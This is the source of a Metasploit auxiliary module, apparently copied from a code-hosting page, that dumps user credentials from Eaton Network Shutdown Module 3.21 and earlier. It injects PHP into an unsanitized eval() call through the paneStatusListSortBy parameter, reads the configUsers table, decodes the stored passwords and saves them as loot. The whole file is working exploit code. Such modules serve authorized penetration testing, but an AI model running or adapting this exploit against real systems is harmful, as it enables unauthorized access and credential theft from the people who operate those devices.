Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/gather/eaton_nsm_creds.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Auxiliary::Report7include Msf::Exploit::Remote::HttpClient89def initialize(info = {})10super(update_info(info,11'Name' => 'Network Shutdown Module sort_values Credential Dumper',12'Description' => %q{13This module will extract user credentials from Network Shutdown Module14versions 3.21 and earlier by exploiting a vulnerability found in15lib/dbtools.inc, which uses unsanitized user input inside a eval() call.16Please note that in order to extract credentials, the vulnerable service17must have at least one USV module (an entry in the "nodes" table in18mgedb.db).19},20'References' =>21[22['OSVDB', '83199'],23['URL', 'https://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']24],25'Author' =>26[27'h0ng10',28'sinn3r'29],30'License' => MSF_LICENSE,31'DisclosureDate' => '2012-06-26'32))3334register_options(35[36Opt::RPORT(4679)37])38end3940def execute_php_code(code, opts = {})41param_name = Rex::Text.rand_text_alpha(6)42padding = Rex::Text.rand_text_alpha(6)43php_code = Rex::Text.encode_base64(code)44url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"4546res = send_request_cgi(47{48'uri' => '/view_list.php',49'method' => 'POST',50'vars_get' =>51{52'paneStatusListSortBy' => url_param,53},54'vars_post' =>55{56param_name => php_code,57},58'headers' =>59{60'Connection' => 'Close'61}62})63res64end6566def read_credentials67pattern = Rex::Text.rand_text_numeric(10)68users_var = Rex::Text.rand_text_alpha(10)69user_var = Rex::Text.rand_text_alpha(10)70php = <<-EOT71$#{users_var} = &queryDB("SELECT * FROM configUsers;");72foreach($#{users_var} as $#{user_var}) {73print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}";74} die();75EOT7677print_status("Reading user credentials from the database")78response = execute_php_code(php)7980if not response or response.code != 200 then81print_error("Failed: Error requesting page")82return83end8485credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)86return credentials87end8889def run90credentials = read_credentials91if credentials.empty?92print_warning("No credentials collected.")93print_warning("Sometimes this is because the server isn't in the vulnerable state.")94return95end9697cred_table = Rex::Text::Table.new(98'Header' => 'Network Shutdown Module Credentials',99'Indent' => 1,100'Columns' => ['Username', 'Password']101)102103credentials.each do |record|104cred_table << [record[0], record[1]]105end106107print_line108print_line(cred_table.to_s)109110loot_name = "eaton.nsm.credentials"111loot_type = "text/csv"112loot_filename = "eaton_nsm_creds.csv"113loot_desc = "Eaton Network Shutdown Module Credentials"114p = store_loot(loot_name, loot_type, datastore['RHOST'], cred_table.to_csv, loot_filename, loot_desc)115print_good("Credentials saved in: #{p.to_s}")116end117end118119120